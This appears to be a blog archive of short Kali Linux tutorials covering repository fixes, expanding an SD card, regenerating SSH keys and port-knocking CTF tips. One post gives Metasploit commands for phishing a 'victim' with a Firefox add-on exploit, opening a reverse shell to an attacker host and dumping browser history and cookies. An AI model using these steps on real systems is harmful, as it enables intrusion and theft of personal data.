Archive | Kali RSS feed for this section

Update Kali Linux Repositories

Getting errors when updating? Check your /etc/apt/sources.list because the labeled “kali” in repository is now “sana” – replace or add:

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free

# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

Afterwards you may have to import your key into your apt-keyring:

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6

suces

Leave a Comment

Raspberry Pi with Kali 2.0 and Expand SD Drive Space

Have extra space on your micro SD card but are not seeing it. No big deal, simply run the commands below to expand your drive space.

root@kali:~# df -h

Filesystem      Size  Used Avail Use% Mounted on
rootfs          2.9G  1.5G  1.2G  56% /
/dev/root       2.9G  1.5G  1.2G  56% /
devtmpfs        460M     0  460M   0% /dev
tmpfs            93M  468K   93M   1% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           186M     0  186M   0% /run/shm

See above how only 1.2G of space is being used.

root@kali:~# wget http://www.alexrams.com/blog/wp-content/uploads/2015/11/raspi-expand-rootfs.sh
root@kali:~# fdisk -l
Disk /dev/mmcblk0: 28.8 GiB, 30908350464 bytes, 60367872 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x000cdbaa

Device         Boot  Start      End  Sectors  Size Id Type
/dev/mmcblk0p1           1   125000   125000   61M  c W95 FAT32 (LBA)
/dev/mmcblk0p2      125001 60366847 60241847 28.7G 83 Linux

Most likely via fdisk -l the starting sector of partition 2 will be “125001”. The script provided above has already made the adjustment.

root@kali:~# chmod +x raspi-expand-rootfs.sh
root@kali:~# sh raspi-expand-rootfs.sh
root@kali:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/root        29G  4.4G   23G  17% /
devtmpfs        369M     0  369M   0% /dev
tmpfs           373M     0  373M   0% /dev/shm
tmpfs           373M  5.5M  367M   2% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           373M     0  373M   0% /sys/fs/cgroup
tmpfs            75M  4.0K   75M   1% /run/user/0
tmpfs            75M  4.0K   75M   1% /run/user/110
tmpfs            75M     0   75M   0% /run/user/1000

root@kali:~# reboot
Leave a Comment

How to Change Your Kali Default SSH Keys

Quick guide to changing the already generated SSH keys. To change your Kali default SSH keys, move the default Kali SSH keys to a new folder first:

cd /etc/ssh/
mkdir default_kali_keys
mv ssh_host_* default_kali_keys/

Next, regenerate the SSH keys:

dpkg-reconfigure openssh-server

Lastly, verify SSH key hashes are different:

md5sum ssh_host_*
md5sum default_kali_keys/*
Leave a Comment
Video

How to Get History and Cookies from Mozilla Firefox with Metasploit

Send the link of the server to the victim via chat, email or other social engineering technique. Once you have access to the victims PC; simply run post module to dump credentials.

msfconsole
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set uripath /
exploit

How to Collect History

use post/firefox/gather/history
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot

How to Collect Cookies

use post/firefox/gather/cookies
set payload firefox/shell_reverse_tcp
set lhost 192.168.72.128
set session 1
exploit
loot
Video

Port Knocking with Knockd and Knock for National Cyber League (NCL)

From Wikipedia “In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s).”[1]

Install the Knockd Service and Client

sudo apt-get install knockd

A challenge may include using knock client and the default knockd sequence to open a new port(s). It is recommended that you scan the client namp -sV -p- -T5 [ipaddress]. This will show the current open port(s) and service/version information. Try the knocked default sequence knock -v [ipaddress] 7000 8000 9000.

There will be no immediate indication that a port has opened after knocking, as you will have to re-scan and compare to find the new open port. More than likely there is a time limit on how long the new port will stay open and available for access.

PROTIP: You may have to use “wget” to extract the flag. The command wget --no-check-certficate https://webaddress:port might extract the page hosted on the open port.

KnockdEfault Evaluator v1.1 – knock-knock

The two tools in this package are knockdefault.py and knockd_on-off.py. The first of these is a scanner to identify default configs and the latter is a utility to interact with identified vulnerable services.[2]

root@kali:~# git clone https://github.com/hack1thu7ch/knock-knock.git
root@kali:~# cd knock-knock/
root@kali:~# ./setup.sh
root@kali:~# ./knockdefault.py

 

Web Citations:
[1] http://en.wikipedia.org/wiki/Port_knocking
[2] http://www.shortbus.ninja/default-knockd-cloaking-configurations/